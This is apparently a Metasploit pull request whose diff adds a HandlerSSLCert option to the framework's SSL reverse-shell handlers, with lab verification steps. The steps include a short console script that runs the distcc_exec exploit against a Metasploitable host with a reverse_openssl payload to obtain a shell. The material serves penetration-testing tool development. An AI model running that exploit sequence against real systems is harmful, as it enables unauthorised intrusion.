### PR TITLE
Allow all SSL handlers to have a custom SSL certificate supplied

### DIFF
--- a/lib/msf/core/exploit/tcp_server.rb
+++ b/lib/msf/core/exploit/tcp_server.rb
@@ -18,7 +18,8 @@ module Exploit::Remote::TcpServer
     register_options(
       [
         OptBool.new('SSL',        [ false, 'Negotiate SSL for incoming connections', false]),
-        OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'TLS1', ['SSL2', 'SSL3', 'TLS1']]),
+        # SSLVersion is currently unsupported for TCP servers (only supported by clients at the moment)
+        # OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'TLS1', ['SSL2', 'SSL3', 'TLS1']]),
         OptPath.new('SSLCert',    [ false, 'Path to a custom SSL certificate (default is randomly generated)']),
         OptAddress.new('SRVHOST', [ true, "The local host to listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]),
         OptPort.new('SRVPORT',    [ true, "The local port to listen on.", 8080 ]),

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -138,7 +138,7 @@ module ReverseHttp
         'MsfExploit' => self,
       },
       comm,
-      (ssl?) ? datastore["SSLCert"] : nil
+      (ssl?) ? datastore["HandlerSSLCert"] : nil
     )
 
     self.service.server_name = datastore['MeterpreterServerName']

--- a/lib/msf/core/handler/reverse_https.rb
+++ b/lib/msf/core/handler/reverse_https.rb
@@ -38,7 +38,12 @@ module ReverseHttps
 
     register_options(
       [
-        OptPort.new('LPORT', [ true, "The local listener port", 8443 ])
+        OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
+      ], Msf::Handler::ReverseHttps)
+
+    register_advanced_options(
+      [
+        OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format"])
       ], Msf::Handler::ReverseHttps)
 
   end

--- a/lib/msf/core/handler/reverse_tcp.rb
+++ b/lib/msf/core/handler/reverse_tcp.rb
@@ -189,7 +189,7 @@ module ReverseTcp
     m.reset
     key = m.digest(datastore["AESPassword"] || "")
 
-    Rex::ThreadFactory.spawn('AESEncryption', false) {
+    Rex::ThreadFactory.spawn('Session-AESEncrypt', false) {
       c1 = OpenSSL::Cipher.new('aes-128-cfb8')
       c1.encrypt
       c1.key=key
@@ -202,7 +202,7 @@ module ReverseTcp
       end
       sock.close()
     }
-    Rex::ThreadFactory.spawn('AESEncryption', false) {
+    Rex::ThreadFactory.spawn('Session-AESDecrypt', false) {
       c2 = OpenSSL::Cipher.new('aes-128-cfb8')
       c2.decrypt
       c2.key=key

--- a/lib/msf/core/handler/reverse_tcp_double_ssl.rb
+++ b/lib/msf/core/handler/reverse_tcp_double_ssl.rb
@@ -47,7 +47,10 @@ module ReverseTcpDoubleSSL
 
     register_advanced_options(
       [
-        OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]),
+        OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
+        OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
+        OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse TCP even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]),
+        OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format"])
       ], Msf::Handler::ReverseTcpDoubleSSL)
 
     self.conn_threads = []
@@ -62,17 +65,54 @@ module ReverseTcpDoubleSSL
     if datastore['Proxies'] and not datastore['ReverseAllowProxy']
       raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true'
     end
-    self.listener_sock = Rex::Socket::TcpServer.create(
-      # 'LocalHost' => datastore['LHOST'],
-      'LocalPort' => datastore['LPORT'].to_i,
-      'Comm'      => comm,
-      'SSL'       => true,
-      'Context'   =>
-        {
-          'Msf'        => framework,
-          'MsfPayload' => self,
-          'MsfExploit' => assoc_exploit
-        })
+
+    ex = false
+
+    comm  = datastore['ReverseListenerComm']
+    if comm.to_s == "local"
+      comm = ::Rex::Socket::Comm::Local
+    else
+      comm = nil
+    end
+
+    local_port = bind_port
+    addrs = bind_address
+
+    addrs.each { |ip|
+      begin
+
+        comm.extend(Rex::Socket::SslTcp)
+        self.listener_sock = Rex::Socket::SslTcpServer.create(
+        'LocalHost' => ip,
+        'LocalPort' => local_port,
+        'Comm'      => comm,
+        'SSLCert'   => datastore['HandlerSSLCert'],
+        'Context'   =>
+          {
+            'Msf'        => framework,
+            'MsfPayload' => self,
+            'MsfExploit' => assoc_exploit
+          })
+
+        ex = false
+
+        comm_used = comm || Rex::Socket::SwitchBoard.best_comm( ip )
+        comm_used = Rex::Socket::Comm::Local if comm_used == nil
+
+        if( comm_used.respond_to?( :type ) and comm_used.respond_to?( :sid ) )
+          via = "via the #{comm_used.type} on session #{comm_used.sid}"
+        else
+          via = ""
+        end
+
+        print_status("Started reverse double SSL handler on #{ip}:#{local_port} #{via}")
+        break
+      rescue
+        ex = $!
+        print_error("Handler failed to bind to #{ip}:#{local_port}")
+      end
+    }
+    raise ex if (ex)
   end
 
   #
@@ -203,6 +243,33 @@ module ReverseTcpDoubleSSL
   end
 
 protected
+
+protected
+
+  def bind_port
+    port = datastore['ReverseListenerBindPort'].to_i
+    port > 0 ? port : datastore['LPORT'].to_i
+  end
+
+  def bind_address
+    # Switch to IPv6 ANY address if the LHOST is also IPv6
+    addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
+    # First attempt to bind LHOST. If that fails, the user probably has
+    # something else listening on that interface. Try again with ANY_ADDR.
+    any = (addr.length == 4) ? "0.0.0.0" : "::0"
+
+    addrs = [ Rex::Socket.addr_ntoa(addr), any  ]
+
+    if not datastore['ReverseListenerBindAddress'].to_s.empty?
+      # Only try to bind to this specific interface
+      addrs = [ datastore['ReverseListenerBindAddress'] ]
+
+      # Pick the right "any" address if either wildcard is used
+      addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
+    end
+
+    addrs
+  end
 
   attr_accessor :listener_sock # :nodoc:
   attr_accessor :listener_thread # :nodoc:

--- a/lib/msf/core/handler/reverse_tcp_double_ssl.rb
+++ b/lib/msf/core/handler/reverse_tcp_double_ssl.rb
@@ -244,8 +244,6 @@ module ReverseTcpDoubleSSL
 
 protected
 
-protected
-
   def bind_port
     port = datastore['ReverseListenerBindPort'].to_i
     port > 0 ? port : datastore['LPORT'].to_i

--- a/lib/msf/core/handler/reverse_tcp_ssl.rb
+++ b/lib/msf/core/handler/reverse_tcp_ssl.rb
@@ -44,9 +44,7 @@ module ReverseTcpSsl
     super
     register_advanced_options(
       [
-        OptPath.new('SSLCert',    [ false, 'Path to a custom SSL certificate (default is randomly generated)']),
-        OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
-        OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
+        OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format"])
       ], Msf::Handler::ReverseTcpSsl)
 
   end
@@ -57,8 +55,8 @@ module ReverseTcpSsl
   # if it fails to start the listener.
   #
   def setup_handler
-    if datastore['Proxies']
-      raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies'
+    if datastore['Proxies'] and not datastore['ReverseAllowProxy']
+      raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true'
     end
 
     ex = false
@@ -81,7 +79,7 @@ module ReverseTcpSsl
         'LocalHost' => ip,
         'LocalPort' => local_port,
         'Comm'      => comm,
-        'SSLCert'	=> datastore['SSLCert'],
+        'SSLCert'   => datastore['HandlerSSLCert'],
         'Context'   =>
           {
             'Msf'        => framework,


### PR DESCRIPTION
This patch introduces HandlerSSLCert as a new option for all SSL-enabled handlers (except Meterpreter, which are handled in a separate PR). 

Custom SSL certificates have been tested with the following handlers:
- cmd/unix/reverse_bash_telnet_ssl
- cmd/unix/reverse_openssl
- cmd/unix/reverse_perl_ssl
- cmd/unix/reverse_php_ssl
- cmd/unix/reverse_python_ssl
- cmd/unix/reverse_ruby_ssl
- cmd/unix/reverse_ssl_double_telnet
- nodejs/shell_reverse_tcp_ssl
- python/shell_reverse_tcp_ssl
- ruby/shell_reverse_tcp_ssl
## Verification
- [x] Provide a unified PEM server certificate. You can make one like so: `sudo cat /etc/ssl/private/ssl-cert-snakeoil.key /etc/ssl/certs/ssl-cert-snakeoil.pem > /tmp/snakeoil.pem`
- [x] Start Wireshark, listen for port 4444.
- [x] In Wireshark, configure port 4444 to decode as SSL.
- [x] Run `./msfconsole -L` with the following RC script (with your IP addresses):

```
use exploit/unix/misc/distcc_exec 
set rhost metasploitable
set lhost 192.168.145.1
set VERBOSE true
set PAYLOAD cmd/unix/reverse_openssl
exploit
```
- [x] Type `id` at the command prompt to prove you have a session.
- [x] VERIFY: The Server hello packet contains a random server certificate. Example: `Certificate (id-at-commonName=cnbqevkaw)`
- [x] Ctrl-C to kill the session.
- [x] In msfconsole, `set HandlerSSLCert /tmp/snakeoil.pem`
- [x] `exploit` again.
- [x] VERIFY: The Server hello packet contains a nonrandom server certificate. Example: `Certificate (id-at-commonName=mazikeen)`
